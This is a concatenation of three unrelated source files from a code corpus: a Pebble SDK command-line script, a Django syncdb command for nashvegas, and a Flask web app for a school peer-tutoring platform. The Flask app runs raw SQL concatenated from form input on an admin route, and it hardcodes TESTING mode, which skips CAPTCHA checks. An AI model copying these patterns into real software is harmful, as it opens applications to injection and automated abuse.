except OutdatedProjectException as e:
PblAnalytics.cmd_fail_evt(args.command, 'outdated project')
logging.error("The Pebble project directory is using an outdated "
"version of the SDK!")
logging.error("Try running `pebble convert-project` to update the "
"project")
return 1
except NoCompilerException as e:
PblAnalytics.missing_tools_evt()
logging.error("The compiler/linker tools could not be found. "
"Ensure that the arm-cs-tools directory is present "
"in the Pebble SDK directory (%s)" %
PblCommand().sdk_path(args))
return 1
except BuildErrorException as e:
PblAnalytics.cmd_fail_evt(args.command, 'compilation error')
logging.error("A compilation error occurred")
return 1
except AppTooBigException as e:
PblAnalytics.cmd_fail_evt(args.command, 'application too big')
logging.error("The built application is too big")
return 1
except Exception as e:
PblAnalytics.cmd_fail_evt(args.command, 'unhandled exception: %s' %
str(e))
logging.error(str(e))
# Print out stack trace if in debug mode to aid in bug reporting
if args.debug:
raise
return 1
if __name__ == '__main__':
retval = PbSDKShell().main()
if retval is None:
retval = 0
sys.exit(retval)
|
sdeyerle/pebble_fun
|
PebbleSDK-2.0-BETA7/tools/pebble.py
|
Python
|
gpl-2.0
| 6,157
|
from django.core.management import call_command
from django.core.management.commands.syncdb import Command as SyncDBCommand
from optparse import make_option
class Command(SyncDBCommand):
option_list = SyncDBCommand.option_list + (
make_option('--skip-migrations',
action='store_false',
dest='migrations',
default=True,
help='Skip nashvegas migrations, do traditional syncdb'),
)
def handle_noargs(self, **options):
# Run migrations first
if options.get("database"):
databases = [options.get("database")]
else:
databases = None
migrations = options.get('migrations')
if migrations:
call_command(
"upgradedb",
do_execute=True,
databases=databases,
interactive=options.get("interactive"),
verbosity=options.get("verbosity"),
)
        # Follow up with a syncdb on anything that wasn't included in migrations
# (this catches things like test-only models)
super(Command, self).handle_noargs(**options)
|
paltman/nashvegas
|
nashvegas/management/commands/syncdb.py
|
Python
|
mit
| 1,185
|
from flask import Flask, session, url_for, redirect, request, render_template, abort
from flask_sqlalchemy import SQLAlchemy
from sqlalchemy.sql import text
import bcrypt
import smtplib
from datetime import datetime, date
import functools
import telepot
import threading
import enum
import requests
import os
import sys
from telepot.loop import MessageLoop
from raven.contrib.flask import Sentry
from raven import Client
from flask_wtf import RecaptchaField, FlaskForm, Recaptcha
app = Flask(__name__)
# Configuration file structure
# Parameters are separated by pipes
# app.secret_key : secret key of the Flask application, keeps logins private
# telegramkey : Telegram bot API key, obtainable from @BotFather
# from_addr : email address used for email notifications
# smtp_login, smtp_password : login and password for SMTP
# sentry_dsn : token for automatic error reporting to sentry.io
# RECAPTCHA_PUBLIC_KEY, RECAPTCHA_PRIVATE_KEY : recaptcha public and private keys, obtainable from Google
# brasamail : if "si", deletes all non-privileged accounts
if "TOX_ENV_NAME" in os.environ and os.environ["TOX_ENV_NAME"]:
dati = "testing|000000000:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA|||||||no"
elif "SITE_CONFIG" in os.environ and os.environ["SITE_CONFIG"]:
dati = os.environ["SITE_CONFIG"]
else:
try:
chiavi = open("./configurazione.txt", 'r')
dati = chiavi.readline()
except FileNotFoundError:
raise FileNotFoundError(
"Devi creare un file configurazione.txt o inserire la configurazione nella variabile di ambiente SITE_CONFIG perchè il sito funzioni!")
app.secret_key, telegramkey, from_addr, smtp_login, smtp_password, sentry_dsn, RECAPTCHA_PUBLIC_KEY, RECAPTCHA_PRIVATE_KEY, brasamail = dati.split(
"|",
    8)  # configurazione.txt structure: appkey|telegramkey|fullemail|gmailaccountname|emailpassword|dsn|REPuKey|REPrKey|brasamail
app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///db.sqlite'
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False
app.config['TESTING'] = True
lock = False
db = SQLAlchemy(app)
if sentry_dsn != "":
client = Client(sentry_dsn)
sentry = Sentry(app, client=client)
else:
client = None
sentry = None
app.config.from_object(__name__)
# Classes
# TODO: add the bot
class User(db.Model):
__tablename__ = 'user'
uid = db.Column(db.Integer, primary_key=True)
username = db.Column(db.String, unique=True, nullable=False)
emailgenitore = db.Column(db.String, nullable=False)
passwd = db.Column(db.LargeBinary, nullable=False)
nome = db.Column(db.String, nullable=False)
cognome = db.Column(db.String, nullable=False)
classe = db.Column(db.String)
tipo = db.Column(db.Integer, nullable=False)
    # 0 = regular user, 1 = peer, 2 = teacher, 3 = administrator
telegram_username = db.Column(db.String)
telegram_chat_id = db.Column(db.String, unique=True)
corsi = db.relationship("Corso", backref="peer")
materie = db.relationship("Abilitato", backref='utente', lazy='dynamic', cascade='delete')
impegno = db.relationship("Impegno")
def __init__(self, username, passwd, nome, cognome, classe, tipo, telegram_username, emailgenitore):
self.username = username
self.passwd = passwd
self.nome = nome
self.cognome = cognome
self.classe = classe
self.tipo = tipo
self.telegram_username = telegram_username
self.emailgenitore = emailgenitore
def __repr__(self):
return "<User {}>".format(self.username, self.passwd, self.nome, self.cognome, self.classe)
def __str__(self):
return self.nome + " " + self.cognome
class Corso(db.Model):
__tablename__ = 'corso'
cid = db.Column(db.Integer, primary_key=True)
pid = db.Column(db.Integer, db.ForeignKey('user.uid'), nullable=False)
argomenti = db.Column(db.String, nullable=False)
materia_id = db.Column(db.Integer, db.ForeignKey('materia.mid'), nullable=False)
impegno = db.relationship("Impegno")
materia = db.relationship("Materia")
    tipo = db.Column(db.Integer, nullable=False)  # 0 = student peer-tutoring session, 1 = teacher remedial course
appuntamento = db.Column(db.DateTime)
limite = db.Column(db.Integer)
occupati = db.Column(db.Integer)
def __init__(self, pid, argomenti, materia_id, tipo):
self.pid = pid
self.argomenti = argomenti
self.materia_id = materia_id
self.tipo = tipo
if tipo == 0:
self.limite = 3
self.occupati = 0
def __repr__(self):
return "<Corso {}>".format(self.cid, self.pid)
class Materia(db.Model):
__tablename__ = "materia"
mid = db.Column(db.Integer, primary_key=True)
nome = db.Column(db.String, nullable=False)
professore = db.Column(db.String, nullable=False)
utente = db.relationship("Abilitato", backref="materia", lazy='dynamic', cascade='delete')
    giorno_settimana = db.Column(db.Integer)  # not a DateTime, unfortunately
    ora = db.Column(db.String)  # not a Time, unfortunately
def __init__(self, nome, professore, giorno, ora):
self.nome = nome
self.professore = professore
self.giorno_settimana = giorno
self.ora = ora
def __repr__(self):
return "<Materia {}>".format(self.nome)
class Impegno(db.Model):
__tablename__ = 'impegno'
iid = db.Column(db.Integer, primary_key=True, unique=True)
corso_id = db.Column(db.Integer, db.ForeignKey('corso.cid'), nullable=False)
stud_id = db.Column(db.Integer, db.ForeignKey('user.uid'), nullable=False)
studente = db.relationship("User")
    appuntamento = db.Column(db.DateTime)  # redundant? definitely
presente = db.Column(db.Boolean, nullable=False)
class Messaggio(db.Model):
__tablename__ = 'messaggio'
mid = db.Column(db.Integer, primary_key=True)
testo = db.Column(db.String)
    data = db.Column(db.Date)  # FIXME: make this a datetime and, at most, display only the date
tipo = db.Column(db.Integer) # 1 = success 2 = primary 3 = warning
def __init__(self, testo, data, tipo):
self.testo = testo
self.data = data
self.tipo = tipo
class Abilitato(db.Model):
    # Association table
__tablename__ = "abilitazioni"
aid = db.Column(db.Integer, primary_key=True)
mid = db.Column(db.Integer, db.ForeignKey('materia.mid'))
uid = db.Column(db.Integer, db.ForeignKey('user.uid'))
def __init__(self, mid, uid):
self.mid = mid
self.uid = uid
def __repr__(self):
return "<Abilitato {} per {}>".format(self.uid, self.mid)
class Log(db.Model):
__tablename__ = "log"
lid = db.Column(db.Integer, primary_key=True)
contenuto = db.Column(db.String)
ora = db.Column(db.DateTime)
def __init__(self, contenuto, ora):
self.contenuto = contenuto
self.ora = ora
class SessioneBot:
def __init__(self, utente, nomemenu):
self.utente = utente
self.nomemenu = nomemenu
class CaptchaForm(FlaskForm):
recaptcha = RecaptchaField()
class TipoUtente(enum.IntEnum):
STUDENTE = 0
PEER = 1
PROF = 2
ADMIN = 3
# Functions
def login(username, password):
user = User.query.filter_by(username=username).first()
try:
return bcrypt.checkpw(bytes(password, encoding="utf-8"), user.passwd)
except AttributeError:
        # If the user does not exist
return False
def find_user(username):
return User.query.filter_by(username=username).first()
def sendemail(to_addr_list, subject, message, smtpserver='smtp.gmail.com:587'):
try:
email_text = """\
From: %s
To: %s
Subject: %s
%s
""" % (from_addr, ", ".join(to_addr_list), subject, message)
server = smtplib.SMTP(smtpserver)
server.starttls()
server.login(smtp_login, smtp_password)
        problems = server.sendmail(from_addr, to_addr_list, email_text)
print(problems)
server.quit()
return True
except Exception as e:
return False
def rendi_data_leggibile(poccio):
data, ora = str(poccio).split(" ", 1)
anno, mese, giorno = data.split("-", 2)
ora, minuto, spazzatura = ora.split(":", 2)
risultato = mese + "/" + giorno + " " + ora + ":" + minuto
return risultato
def broadcast(msg, utenti=None):
if utenti is None:
utenti = []
for utente in utenti:
if utente.telegram_chat_id:
bot.sendMessage(utente.telegram_chat_id, msg)
# Decorators
def login_or_redirect(f):
@functools.wraps(f)
def func(*args, **kwargs):
if not session.get("username"):
return redirect(url_for('page_login'))
return f(*args, **kwargs)
return func
def login_or_403(f):
@functools.wraps(f)
def func(*args, **kwargs):
if not session.get("username"):
abort(403)
return
return f(*args, **kwargs)
return func
def rank_or_403(minimum):
"""Richiedi che l'utente loggato sia del tipo specificato o superiore, oppure restituisci un errore 403.
Implica @login_or_403."""
def decorator(f):
@functools.wraps(f)
@login_or_403
def func(*args, **kwargs):
utente = find_user(session['username'])
if utente.tipo < minimum:
abort(403)
return
return f(*args, utente=utente, **kwargs)
return func
return decorator
# Error handlers
@app.errorhandler(400)
def page_400(_):
return render_template('400.htm'), 400
@app.errorhandler(403)
def page_403(_):
return render_template('403.htm'), 403
@app.errorhandler(404)
def page_404(_):
return render_template('404.htm'), 404
@app.errorhandler(500)
def page_500(_):
e = "Questo tipo di errore si verifica di solito quando si fanno richieste strane al sito (ad esempio si sbaglia il formato di una data o simili) oppure quando si cerca di creare un account con un nome utente già esistente."
return render_template('500.htm', e=e), 500
# Pages
@app.route('/')
@login_or_redirect
def page_home():
del session['username']
return redirect(url_for('page_login'))
@app.route('/login', methods=['GET', 'POST'])
def page_login():
if request.method == 'GET':
css = url_for("static", filename="style.css")
return render_template("login.htm", css=css)
else:
username = request.form.get("username")
password = request.form.get("password")
if not username or not password:
abort(400)
return
if login(username, password):
session['username'] = username
return redirect(url_for('page_dashboard'))
else:
abort(403)
@app.route('/register', methods=['GET', 'POST'])
def page_register():
if request.method == 'GET':
form = CaptchaForm()
return render_template("User/add.htm", captcha=form)
else:
if not request.form.get('g-recaptcha-response') and not app.config["TESTING"]:
# Missing captcha
abort(400)
return
if not app.config["TESTING"]:
# Validate CAPTCHA, or assume any captcha is valid while testing
if not Recaptcha(request.form.get('g-recaptcha-response')):
# Invalid captcha
abort(403)
return
p = bytes(request.form["password"], encoding="utf-8")
cenere = bcrypt.hashpw(p, bcrypt.gensalt())
utenti = User.query.all()
valore = TipoUtente.STUDENTE
if len(utenti) == 0:
valore = TipoUtente.ADMIN
nuovouser = User(request.form['username'], cenere, request.form['nome'], request.form['cognome'],
request.form['classe'], valore, request.form['usernameTelegram'], request.form['mailGenitori'])
stringa = "L'utente " + nuovouser.username + " si è iscritto a Condivisione."
nuovorecord = Log(stringa, datetime.now())
db.session.add(nuovorecord)
db.session.add(nuovouser)
db.session.commit()
return redirect(url_for('page_login'))
@app.route('/dashboard')
@login_or_redirect
def page_dashboard():
logged = len(session)
utente = find_user(session['username'])
messaggi = Messaggio.query.order_by(Messaggio.data.desc()).all()
corsi = Corso.query.join(Materia).join(User).all()
query1 = text(
"SELECT impegno.*, materia.nome, materia.giorno_settimana, materia.ora, impegno.appuntamento, corso.limite, corso.occupati , corso.pid FROM impegno JOIN corso ON impegno.corso_id=corso.cid JOIN materia ON corso.materia_id = materia.mid JOIN user ON impegno.stud_id = user.uid WHERE corso.pid=:x;")
impegni = db.session.execute(query1, {"x": utente.uid}).fetchall()
query2 = text(
"SELECT impegno.*, materia.nome, materia.giorno_settimana, materia.ora, impegno.appuntamento, corso.limite, corso.occupati, corso.pid FROM impegno JOIN corso ON impegno.corso_id=corso.cid JOIN materia ON corso.materia_id = materia.mid JOIN user ON impegno.stud_id = user.uid WHERE impegno.stud_id=:x;")
lezioni = db.session.execute(query2, {"x": utente.uid}).fetchall()
return render_template("dashboard.htm", utente=utente, messaggi=messaggi, corsi=corsi, impegni=impegni,
lezioni=lezioni, logged=logged)
@app.route('/informazioni')
def page_informazioni():
return render_template("informazioni.htm")
@app.route('/message_add', methods=['GET', 'POST'])
@rank_or_403(TipoUtente.ADMIN)
def page_message_add(utente):
if request.method == "GET":
return render_template("Message/add.htm", utente=utente)
else:
oggi = date.today()
nuovomessaggio = Messaggio(request.form['testo'], oggi, request.form['scelta'])
db.session.add(nuovomessaggio)
db.session.commit()
return redirect(url_for('page_dashboard'))
@app.route('/message_del/<int:mid>')
@rank_or_403(TipoUtente.ADMIN)
def page_message_del(mid, utente):
messaggio = Messaggio.query.get_or_404(mid)
db.session.delete(messaggio)
db.session.commit()
return redirect(url_for('page_dashboard'))
@app.route('/user_list')
@rank_or_403(TipoUtente.ADMIN)
def page_user_list(utente):
utenti = User.query.all()
return render_template("User/list.htm", utente=utente, utenti=utenti)
@app.route('/user_changepw/<int:uid>', methods=['GET', 'POST'])
@rank_or_403(TipoUtente.ADMIN)
def page_user_changepw(uid, utente):
if request.method == "GET":
entita = User.query.get_or_404(uid)
return render_template("User/changepw.htm", utente=utente, entita=entita)
else:
stringa = "L'utente " + utente.username + " ha cambiato la password a " + str(uid)
nuovorecord = Log(stringa, datetime.today())
db.session.add(nuovorecord)
entita = User.query.get_or_404(uid)
p = bytes(request.form["password"], encoding="utf-8")
cenere = bcrypt.hashpw(p, bcrypt.gensalt())
entita.passwd = cenere
db.session.commit()
return redirect(url_for('page_user_list'))
@app.route('/user_ascend/<int:uid>', methods=['GET', 'POST'])
@rank_or_403(TipoUtente.ADMIN)
def page_user_ascend(uid, utente):
entita = User.query.get_or_404(uid)
if request.method == 'GET' and entita.tipo == 0:
materie = Materia.query.all()
return render_template("User/ascend.htm", utente=utente, entita=entita, materie=materie)
elif entita.tipo == 1:
return redirect('/peer_inspect/{}'.format(entita.uid))
else:
stringa = "L'utente " + utente.username + " ha reso PEER l'utente " + str(uid)
nuovorecord = Log(stringa, datetime.today())
db.session.add(nuovorecord)
materie = list()
while True:
materiestring = 'materia{}'.format(len(materie))
if materiestring in request.form:
materie.append(request.form[materiestring])
else:
break
for materia in materie:
nuovocompito = Abilitato(materia, entita.uid)
db.session.add(nuovocompito)
entita.tipo = 1
db.session.commit()
return redirect(url_for('page_user_list'))
@app.route('/peer_inspect/<int:uid>', methods=['GET', 'POST'])
@rank_or_403(TipoUtente.ADMIN)
def page_peer_inspect(uid, utente):
querylibere = text(
"SELECT * FROM materia WHERE materia.mid NOT IN (SELECT materia.mid FROM materia JOIN abilitazioni ON materia.mid=abilitazioni.mid JOIN user ON abilitazioni.uid=user.uid WHERE user.uid=:x)")
materielibere = db.session.execute(querylibere, {"x": uid}).fetchall()
if materielibere is None:
materielibere = [['0', 'Materia dummy', 'Segnaposto', "1", "14:30"]]
peer = User.query.get_or_404(uid)
autorizzate = Materia.query.join(Abilitato).filter_by(uid=peer.uid).join(User).all()
return render_template("/User/peerinspect.htm", utente=utente, materielibere=materielibere, peer=peer,
autorizzate=autorizzate)
@app.route('/peer_del/<int:mid>/<int:uid>')
@rank_or_403(TipoUtente.ADMIN)
def page_peer_del(mid, uid, utente):
stringa = "L'utente " + utente.username + " ha rimosso dalla peer education " + str(uid)
nuovorecord = Log(stringa, datetime.today())
db.session.add(nuovorecord)
abilitazione = Abilitato.query.filter_by(uid=uid, mid=mid).first()
db.session.delete(abilitazione)
db.session.commit()
return redirect('/peer_inspect/{}'.format(abilitazione.uid))
@app.route('/peer_add/<int:mid>/<int:uid>')
@rank_or_403(TipoUtente.ADMIN)
def page_peer_add(mid, uid, utente):
stringa = "L'utente " + utente.username + " ha aggiunto un abilitazione a " + str(uid)
nuovorecord = Log(stringa, datetime.today())
db.session.add(nuovorecord)
nuovabi = Abilitato(mid, uid)
db.session.add(nuovabi)
db.session.commit()
return redirect('/peer_inspect/{}'.format(uid))
@app.route("/peer_remove/<int:uid>")
@rank_or_403(TipoUtente.ADMIN)
def page_peer_remove(uid, utente):
stringa = "L'utente " + utente.username + " ha tolto un abilitazione a " + str(uid)
nuovorecord = Log(stringa, datetime.today())
db.session.add(nuovorecord)
entita = User.query.get_or_404(uid)
entita.tipo = 0
for materia in entita.materie:
db.session.delete(materia)
db.session.commit()
return redirect(url_for('page_user_list'))
@app.route('/user_godify/<int:uid>')
@rank_or_403(TipoUtente.ADMIN)
def page_user_godify(uid, utente):
stringa = "L'utente " + utente.username + " ha reso ADMIN l'utente " + str(uid)
nuovorecord = Log(stringa, datetime.today())
db.session.add(nuovorecord)
entita = User.query.get_or_404(uid)
if entita.tipo == 3:
entita.tipo = 1
else:
entita.tipo = 3
db.session.commit()
return redirect(url_for('page_user_list'))
@app.route('/user_teacher/<int:uid>')
@rank_or_403(TipoUtente.ADMIN)
def page_user_teacher(uid, utente):
entita = User.query.get_or_404(uid)
if entita.tipo == 2:
corsi = Corso.query.filter_by(pid=uid).all()
for corso in corsi:
            db.session.delete(corso)
entita.tipo = 0
else:
entita.tipo = 2
db.session.commit()
return redirect(url_for('page_user_list'))
@app.route('/user_del/<int:uid>')
@rank_or_403(TipoUtente.ADMIN)
def page_user_del(uid, utente):
stringa = "L'utente " + utente.username + " ha ELIMINATO l'utente " + str(uid)
nuovorecord = Log(stringa, datetime.today())
db.session.add(nuovorecord)
entita = User.query.get_or_404(uid)
corsi = Corso.query.filter_by(pid=entita.uid).all()
for corso in corsi:
stringa = "L'utente " + utente.username + " ha ELIMINATO il corso " + str(corso.cid)
nuovorecord = Log(stringa, datetime.today())
db.session.add(nuovorecord)
for oggetti in corso.impegno:
db.session.delete(oggetti)
db.session.delete(corso)
for materia in entita.materie:
stringa = "L'utente " + utente.username + " ha ELIMINATO la materia " + str(materia.mid)
nuovorecord = Log(stringa, datetime.today())
db.session.add(nuovorecord)
db.session.delete(materia)
for compito in entita.impegno:
db.session.delete(compito)
db.session.delete(entita)
db.session.commit()
return redirect(url_for('page_user_list'))
@app.route('/user_inspect/<int:pid>')
@login_or_403
def page_user_inspect(pid):
utente = find_user(session['username'])
entita = User.query.get_or_404(pid)
return render_template("User/inspect.htm", utente=utente, entita=entita)
@app.route('/user_edit/<int:uid>', methods=['GET', 'POST'])
@login_or_403
def page_user_edit(uid):
utente = find_user(session['username'])
if utente.uid != uid:
abort(403)
else:
if request.method == 'GET':
entita = User.query.get_or_404(uid)
return render_template("User/edit.htm", utente=utente, entita=entita)
else:
stringa = "L'utente " + utente.username + " ha modificato il proprio profilo"
nuovorecord = Log(stringa, datetime.today())
db.session.add(nuovorecord)
entita = User.query.get_or_404(uid)
if request.form["password"] != "":
p = bytes(request.form["password"], encoding="utf-8")
cenere = bcrypt.hashpw(p, bcrypt.gensalt())
entita.passwd = cenere
entita.classe = request.form["classe"]
entita.telegram_username = request.form["usernameTelegram"]
entita.emailgenitore = request.form['mailGenitori']
db.session.commit()
return redirect(url_for('page_dashboard'))
@app.route('/materia_add', methods=['GET', 'POST'])
@rank_or_403(TipoUtente.PROF)
def page_materia_add(utente):
if request.method == 'GET':
return render_template("Materia/add.htm", utente=utente)
else:
stringa = "L'utente " + utente.username + " ha creato una materia "
nuovorecord = Log(stringa, datetime.today())
db.session.add(nuovorecord)
nuovamateria = Materia(request.form["nome"], request.form["professore"], request.form["giorno"],
request.form['ora'])
db.session.add(nuovamateria)
db.session.commit()
return redirect(url_for('page_materia_list'))
@app.route('/materia_list')
@rank_or_403(TipoUtente.PROF)
def page_materia_list(utente):
materie = Materia.query.all()
return render_template("Materia/list.htm", utente=utente, materie=materie)
@app.route('/materia_edit/<int:mid>', methods=['GET', 'POST'])
@rank_or_403(TipoUtente.PROF)
def page_materia_edit(mid, utente):
if request.method == 'GET':
materia = Materia.query.get_or_404(mid)
return render_template("Materia/edit.htm", utente=utente, materia=materia)
else:
stringa = "L'utente " + utente.username + " ha modificato la materia " + str(mid)
nuovorecord = Log(stringa, datetime.today())
db.session.add(nuovorecord)
materia = Materia.query.get_or_404(mid)
materia.nome = request.form['nome']
materia.professore = request.form['professore']
materia.giorno_settimana = request.form['giorno']
materia.ora = request.form['ora']
db.session.commit()
return redirect(url_for('page_materia_list'))
@app.route('/materia_del/<int:mid>')
@rank_or_403(TipoUtente.PROF)
def page_materia_del(mid, utente):
materia = Materia.query.get_or_404(mid)
corsi = Corso.query.filter_by(materia_id=mid).all()
stringa = "L'utente " + utente.username + " ha ELIMINATO la materia " + str(mid)
nuovorecord = Log(stringa, datetime.today())
db.session.add(nuovorecord)
for corso in corsi:
for impegni in corso.impegno:
db.session.delete(impegni)
db.session.delete(corso)
stringa = "L'utente " + utente.username + " ha ELIMINATO il corso " + str(corso.cid)
nuovorecord = Log(stringa, datetime.today())
db.session.add(nuovorecord)
db.session.delete(materia)
db.session.commit()
return redirect(url_for('page_dashboard'))
@app.route('/corso_add', methods=['GET', 'POST'])
@rank_or_403(TipoUtente.PEER)
def page_corso_add(utente):
if utente.tipo == 1:
if request.method == 'GET':
autorizzate = Materia.query.join(Abilitato).filter_by(uid=utente.uid).join(User).all()
print(autorizzate)
return render_template("Corso/add.htm", utente=utente, materie=autorizzate)
else:
stringa = "L'utente " + utente.username + "ha creato un nuovo corso "
nuovorecord = Log(stringa, datetime.today())
db.session.add(nuovorecord)
nuovocorso = Corso(utente.uid, request.form['argomenti'], request.form['materia'], 0)
db.session.add(nuovocorso)
db.session.commit()
return redirect(url_for('page_dashboard'))
elif utente.tipo == 2:
if request.method == 'GET':
materie = Materia.query.all()
return render_template("Recuperi/add.htm", utente=utente, materie=materie)
else:
stringa = "L'utente " + utente.username + "ha creato un nuovo corso "
nuovorecord = Log(stringa, datetime.today())
db.session.add(nuovorecord)
nuovocorso = Corso(utente.uid, request.form['argomenti'], request.form['materia'], 1)
yyyy, mm, dd = request.form["data"].split("-", 2)
hh, mi = request.form["ora"].split(":", 1)
try:
data = datetime(int(yyyy), int(mm), int(dd), int(hh), int(mi))
except ValueError:
                # TODO: show a nicer error
abort(400)
return
nuovocorso.appuntamento = data
nuovocorso.limite = request.form["massimo"]
db.session.add(nuovocorso)
db.session.commit()
utenze = User.query.all()
oggetto = Materia.query.filter_by(mid=request.form['materia'])
msg = "E' stato creato un nuovo corso di " + oggetto[
0].nome + "!.\nPer maggiori informazioni, collegati a Condivisione!"
broadcast(msg, utenze)
return redirect(url_for('page_dashboard'))
@app.route('/corso_del/<int:cid>')
@rank_or_403(TipoUtente.PEER)
def page_corso_del(cid, utente):
stringa = "L'utente " + utente.username + " ha ELIMINATO il corso " + str(cid)
nuovorecord = Log(stringa, datetime.today())
db.session.add(nuovorecord)
corso = Corso.query.get_or_404(cid)
impegni = Impegno.query.all()
for impegno in impegni:
if impegno.corso_id == cid:
db.session.delete(impegno)
stringa = "L'utente " + utente.username + " ha ELIMINATO l'impegno " + str(impegno.iid)
nuovorecord = Log(stringa, datetime.today())
db.session.add(nuovorecord)
db.session.delete(corso)
db.session.commit()
return redirect(url_for('page_dashboard'))
@app.route('/corso_join/<int:cid>', methods=['GET', 'POST'])
@login_or_403
def page_corso_join(cid):
global telegramkey
utente = find_user(session['username'])
impegni = Impegno.query.filter_by(stud_id=utente.uid).all()
for impegno in impegni:
if impegno.stud_id == utente.uid and impegno.corso_id == cid:
return redirect(url_for('page_dashboard'))
corso = Corso.query.get_or_404(cid)
if corso.occupati >= corso.limite:
return redirect(url_for('page_dashboard'))
corso.occupati = corso.occupati + 1
stringa = "L'utente " + utente.username + " ha chiesto di unirsi al corso " + str(cid)
nuovorecord = Log(stringa, datetime.today())
db.session.add(nuovorecord)
nuovoimpegno = Impegno(studente=utente,
corso_id=cid, presente=False)
if corso.tipo != 0:
print(corso.materia.nome)
nuovoimpegno.appuntamento = corso.appuntamento
oggetto = "Condivisione - Iscrizione alla lezione"
mail = "\n\nSuo figlio si e' iscritto ad una lezione sulla piattaforma Condivisione. Per maggiori informazioni, collegarsi al sito.\nQuesto messaggio e' stato creato automaticamente da Condivisione. Messaggi inviati a questo indirizzo non verranno letti. Per qualsiasi problema, contattare la segreteria."
db.session.add(nuovoimpegno)
db.session.commit()
if sendemail(utente.emailgenitore, oggetto, mail):
pass
else:
pass
if utente.telegram_chat_id:
testo = "Ti sei iscritto al corso di {}, che si terrà il prossimo lunedì!".format(corso.materia)
param = {"chat_id": utente.telegram_chat_id, "text": testo}
requests.get("https://api.telegram.org/bot" + telegramkey + "/sendMessage", params=param)
else:
pass
insegnante = User.query.get_or_404(corso.pid)
if insegnante.telegram_chat_id:
testo = "Lo studente {} {} si è iscritto al tuo corso!".format(utente.nome, utente.cognome)
param = {"chat_id": utente.telegram_chat_id, "text": testo}
requests.get("https://api.telegram.org/bot" + telegramkey + "/sendMessage", params=param)
else:
pass
return redirect(url_for('page_dashboard'))
@app.route('/server_log')
@rank_or_403(TipoUtente.ADMIN)
def page_log_view(utente):
logs = Log.query.order_by(Log.ora.desc()).all()
return render_template("logs.htm", logs=logs, utente=utente)
@app.route('/corso_membri/<int:cid>')
@rank_or_403(TipoUtente.PEER)
def corso_membri(cid, utente):
query = text(
"SELECT corso.*, impegno.stud_id, impegno.presente, user.cognome, user.nome FROM corso JOIN impegno ON corso.cid = impegno.corso_id JOIN user on impegno.stud_id = user.uid WHERE corso.cid=:x;")
utenti = db.session.execute(query, {"x": cid}).fetchall()
return render_template("Corso/membri.htm", utente=utente, entita=utenti, idcorso=cid)
@app.route('/presenza/<int:uid>/<int:cid>')
@login_or_403
def page_presenza(uid, cid):
utente = find_user(session['username'])
lezione = Corso.query.get(cid)
if utente.tipo < 1 or utente.uid != lezione.pid:
abort(403)
else:
impegno = Impegno.query.filter_by(stud_id=uid, corso_id=cid).first()
if impegno.presente:
impegno.presente = False
else:
impegno.presente = True
db.session.commit()
return redirect(url_for('corso_membri', cid=cid))
@app.route('/impegno_del/<int:uid>/<int:cid>')
@login_or_403
def page_impegno_del(uid, cid):
utente = find_user(session['username'])
lezione = Corso.query.get(cid)
if utente.tipo < 1 or utente.uid != lezione.pid:
abort(403)
else:
impegno = Impegno.query.filter_by(stud_id=uid, corso_id=cid).first()
lezione.occupati = lezione.occupati - 1
db.session.delete(impegno)
db.session.commit()
return redirect(url_for('corso_membri', cid=cid))
def build_csv(utenti, lezione):
global lock
# PEER_EMAIL,MATERIA,DATA,U1_EMAIL,U1_PRESENTE,U2_EMAIL,U2_PRESENTE,U3_EMAIL,U3_PRESENTE
peer_data = User.query.get_or_404(lezione.pid)
materia = Materia.query.get_or_404(lezione.materia_id)
data = datetime.today().now()
stringa = "{},{},{}".format(peer_data.username, materia.nome, data)
for i in range(0, 3, 1):
if len(utenti) > i:
stringa = stringa + ",{},{}".format(utenti[i][13], str(utenti[i][9]))
else:
stringa = stringa + ",-,-"
while lock:
pass
lock = True
with open("./courselog.csv", "a") as csv:
csv.write(stringa + "\n")
lock = False
@app.route('/inizialezione/<int:cid>')
@login_or_403
def page_inizia(cid):
utente = find_user(session['username'])
lezione = Corso.query.get_or_404(cid)
if utente.tipo < 1 or utente.uid != lezione.pid:
abort(403)
query = text(
"SELECT corso.*, impegno.stud_id, impegno.presente, user.cognome, user.nome, user.emailgenitore, user.username FROM corso JOIN impegno ON corso.cid = impegno.corso_id JOIN user on impegno.stud_id = user.uid WHERE corso.cid=:x;")
utenti = db.session.execute(query, {"x": cid}).fetchall()
for utente2 in utenti:
if utente2[9]:
oggetto = "Condivisione - Partecipazione alla lezione"
mail = "\n\nSuo figlio e' presente alla lezione di oggi pomeriggio.\nQuesto messaggio e' stato creato automaticamente da Condivisione. Messaggi inviati a questo indirizzo non verranno letti. Per qualsiasi problema, contattare la segreteria."
sendemail(utente2[12], oggetto, mail)
else:
oggetto = "Condivisione - Assenza alla lezione"
mail = "\n\nSuo figlio non e' presente alla lezione di oggi pomeriggio.\nQuesto messaggio e' stato creato automaticamente da Condivisione. Messaggi inviati a questo indirizzo non verranno letti. Per qualsiasi problema, contattare la segreteria."
sendemail(utente2[12], oggetto, mail)
stringa = "L'utente " + utente.username + " ha INIZIATO il corso " + str(cid)
nuovorecord = Log(stringa, datetime.today())
db.session.add(nuovorecord)
corso = Corso.query.get_or_404(cid)
build_csv(utenti, lezione)
impegni = Impegno.query.all()
for impegno in impegni:
if impegno.corso_id == cid:
db.session.delete(impegno)
stringa = "L'utente " + utente.username + " ha ELIMINATO l'impegno " + str(impegno.iid)
nuovorecord = Log(stringa, datetime.today())
db.session.add(nuovorecord)
db.session.delete(corso)
db.session.commit()
return redirect(url_for('page_dashboard'))
@app.route('/ricerca', methods=["GET", "POST"])
@rank_or_403(TipoUtente.ADMIN)
def page_ricerca(utente):
if request.method == 'GET':
return render_template("query.htm", pagetype="query")
else:
try:
result = db.engine.execute("SELECT " + request.form["query"] + ";")
except Exception as e:
return render_template("query.htm", query=request.form["query"], error=repr(e), pagetype="query")
return render_template("query.htm", query=request.form["query"], result=result,
pagetype="query")
@app.route('/lettura_registro')
@rank_or_403(TipoUtente.ADMIN)
def page_lettura_registro(utente):
global lock
while lock:
pass
lock = True
with open("./courselog.csv", "r") as csv:
logs = csv.readlines()
lock = False
stringa = ""
for log in logs:
stringa += log + "\n"
return stringa
@app.route('/brasatura/<int:mode>', methods=["GET"])
@rank_or_403(TipoUtente.ADMIN)
def page_brasatura(mode, utente):
if mode == 1:
return render_template("brasatura.htm")
elif mode == 2:
utenti = User.query.filter_by(tipo=0).all()
dstring = ""
for u in utenti:
stringa = "L'utente " + u.username + " ha BRASATO l'utente " + str(u.uid)
